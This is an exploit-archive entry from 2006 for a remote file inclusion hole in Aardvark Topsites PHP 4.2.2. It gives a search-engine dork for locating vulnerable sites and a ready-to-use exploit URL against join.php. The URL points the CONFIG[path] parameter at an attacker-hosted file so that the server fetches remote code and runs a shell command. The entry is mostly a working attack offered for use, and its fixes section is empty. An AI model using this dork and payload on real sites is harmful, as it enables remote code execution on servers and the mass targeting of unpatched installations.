Aardvark Topsites PHP <= 4.2.2 (path) Remote File Inclusion Vuln

2006-04-30 00:00:00

Title: Aardvark Topsites PHP 4.2.2 remote file inclusion
URL: http://www.aardvarktopsitesphp.com/
Dork: "Powered By Aardvark Topsites PHP 4.2.2"

Exploit: /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls

#

Fixes

No fixes

In order to submit a new fix you need to be registered.